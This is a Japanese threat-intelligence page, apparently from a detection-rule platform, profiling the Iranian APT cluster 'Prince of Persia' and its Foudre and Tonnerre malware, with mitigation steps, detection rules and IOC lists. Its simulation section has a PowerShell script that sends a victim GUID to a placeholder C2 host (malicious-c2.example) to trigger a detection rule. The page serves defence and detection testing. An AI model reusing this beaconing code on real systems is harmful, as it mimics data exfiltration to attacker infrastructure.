ペルシャの王子: イランのAPT活動に関する10年の回顧
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
このレポートでは、イランのステートリンクAPTクラスター「ペルシャの王子」をプロファイルし、過去10年間の進展を追跡しています。特に2023年から2025年にかけて観測された活動に重点を置いています。運用者は、諜報活動と体系的なデータ窃盗を支援するために、Foudre、Tonnerre、MaxPinner、Rugissement、Deep Freezeなどの特注マルウェアファミリーに依存しています。最近のバージョンでは、ドメイン生成アルゴリズム、Telegramベースのコマンド&コントロール、暗号化されたSFXペイロードを導入し、耐性と隠蔽性を向上させています。ターゲットは、複数の地域にわたる重要インフラと反体制派に関連するネットワークを含んでいます。
調査
SafeBreachの研究者たちは、2019年以降のグループの活動を追跡し、新しいサンプルを収集し、C2アーキテクチャを文書化し、DGAロジックを分析しました。彼らは保護されたペイロードを復号化し、Telegramボットの認証情報を抽出し、バリアントの展開タイムラインを構築しました。この研究は、別個の生産およびテストのインフラストラクチャを強調し、Excel駆動の感染チェーンに関連するファイルドロップの挙動を詳細に示しています。マルウェアのハッシュ、ドメイン、URLからコンプロマイズの指標が組み立てられました。
緩和策
特定されたDGAパターンのDNSアクティビティを監視し、既知の悪意のあるドメインをブロックし、Telegramボットに関連するトラフィックを制限または検査します。参照されたマルウェアのファイル名とローダーDLLアーティファクトの検出を追加し、回転するインフラストラクチャを検出するためにDNSモニタリング/シンクホーリングを使用します。アプリケーションの許可リストを実施し、Officeセキュリティを強化してマクロを制限し、初期アクセスの可能性を減らします。
対応
いずれかの指標が見つかった場合、影響を受けたシステムを隔離し、揮発性の証拠を収集し、ドロップされたファイルと関連するレジストリパスでターゲットフォレンジックスを実行します。リンクされたすべてのドメインとIPアドレスをブロックし、漏洩したTelegramボットトークンを回転し、影響を受けたアカウントの資格情報をリセットします。カスタムローダーDLLの残骸と暗号化されたSFXペイロードを環境全体で追跡し、完全な根絶を確実にします。
アタックフロー
検出
コマンド&コントロールチャンネルとしての可能性のあるTelegramの悪用(dns_query経由)
表示
第三者サービス/ツール経由での可能性のあるデータの流入/流出/C2(プロキシ経由)
表示
通常でないトップレベルドメイン(TLD)DNS要求による不審なコマンド&コントロール(dns経由)
表示
不審なTaskkillの実行(cmdline経由)
表示
検出するためのIOC(HashSha256):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査 パート2
表示
検出するためのIOC(SourceIP):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査
表示
検出するためのIOC(HashSha256):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査 パート1
表示
検出するためのIOC(HashMd5):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査
表示
検出するためのIOC(DestinationIP):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査
表示
Excelファイルに埋め込まれた実行可能ファイルによるFoudre v34感染の検出 [Windows プロセス生成]
表示
FoudreとTonnerre C2通信の検出 [Windows ネットワーク接続]
表示
シミュレーション実行
前提条件:テレメトリとベースラインの事前飛行チェックは合格している必要があります。
根拠:このセクションでは、検出ルールをトリガーするために設計された敵の手法(T1584.005)の正確な実行を詳細に説明します。コマンドとナラティブは、特定されたTTPに直接反映され、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃の物語とコマンド:
脅威インテリジェンスは悪意のあるドメインを設定しましたmalicious-c2.exampleこれは、Foudre/Tonnerre C2サーバーをホストしています。アタッカーのペイロードは、被害者のマシン上で2つのHTTP GETリクエストを実行します:- 被害者のGUIDをFoudre C2エンドポイントに送信し、パスを使用します
/1/?c=<GUID>. - Tonnerreバックドアを介してTelegramのAPIにアクセスし、パスを使用します
/t/tga.adr.
両方のリクエストはHTTP経由で行われ(プロキシログを簡素化するため)、一般的なユーザーエージェントを含んで通常のトラフィックと混ざるようにします。これらのアクションは、Sigmaルールが監視する正確なフィールド(
request_method=GET,urlを含むターゲットとするサブストリング)を生成します。 - 被害者のGUIDをFoudre C2エンドポイントに送信し、パスを使用します
-
回帰テストスクリプト:
# ------------------------------------------------------------ # Foudre & Tonnerre C2通信シミュレーション(Windows) # ------------------------------------------------------------ # 1. 被害者のGUIDを定義します(実際の感染であれば、レジストリから読み取られます) $guid = (New-Guid).Guid # 2. 悪意のあるC2ホストを定義します(テスト用にあなたの管理するアドレスに置き換えてください) $c2Host = "http://malicious-c2.example" # 3. GUIDをFoudre C2エンドポイントに送信します $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] GUIDをFoudre C2に送信中: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Tonnerreバックドアを介してTelegram APIにアクセスします $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Telegram APIエンドポイントにアクセス中: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] シミュレーション完了。SIEMでアラートを確認してください。"スクリプトは自己完結しています。プロキシを経由してトラフィックをルーティングするWindowsホスト上で実行すると、Sigmaルールの
url|contains条件に一致する2つのログエントリが生成されます。 -
クリーンアップコマンド:
# 一時的なネットワーク接続を削除します(プロキシが持続的なセッションを作成する場合にのみ関連) # ここでは、悪意のあるホストの解決の残存を避けるためにDNSキャッシュを単にクリアします。 ipconfig /flushdns Write-Host "[*] クリーンアップ完了。"